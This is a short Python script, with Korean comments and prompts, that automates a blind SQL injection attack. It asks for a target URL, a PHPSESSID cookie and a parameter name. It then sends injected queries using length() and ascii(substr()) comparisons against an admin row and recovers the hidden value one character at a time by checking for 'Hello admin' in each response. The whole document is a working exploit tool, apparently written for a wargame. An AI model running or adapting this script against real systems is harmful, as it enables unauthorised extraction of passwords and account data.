1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| import requests
# 길이 확인
def check_length(url, cookie, param_name):
head = {"PHPSESSID":f"{cookie}"}
print("대상 문자열의 길이를 확인중입니다..")
for num in range(0,30):
param=f"?{param_name}=' or id=\"admin\" and length({param_name})={num} %23"
my_url=url+param
res=requests.get(my_url, cookies=head)
if("Hello admin" in res.text):
return num
# 문자열 찾기
def blind_sqli(url, cookie, param_name, length):
head = {"PHPSESSID":f"{cookie}"}
ans=""
for len in range(1, length+1):
print(f"{len}번째 문자에 대해 검색중입니다..")
for ran in range(32,127):
param=f"?{param_name}=' or id=\"admin\" and ascii(substr({param_name},{len},1))={ran} %23"
my_url=url+param
res=requests.get(my_url, cookies=head)
if("Hello admin" in res.text):
# print(f"{len}번째 문자:{chr(ran)}")
ans+=chr(ran)
break
return ans
# 실행 순서
if __name__ == "__main__":
print("💘 Blind 공격을 시작합니다")
url=input("URL을 입력하세요:")
cookie=input("cookie를 알려주세요:")
param_name=input("파라미터의 이름을 알려주세요:")
length=check_length(url, cookie, param_name)
print(f"👏 {param_name}의 길이는 {length}입니다.")
ans=blind_sqli(url, cookie, param_name, length)
print(f"👏 {param_name}의 정체는 {ans}입니다!")
exit
|
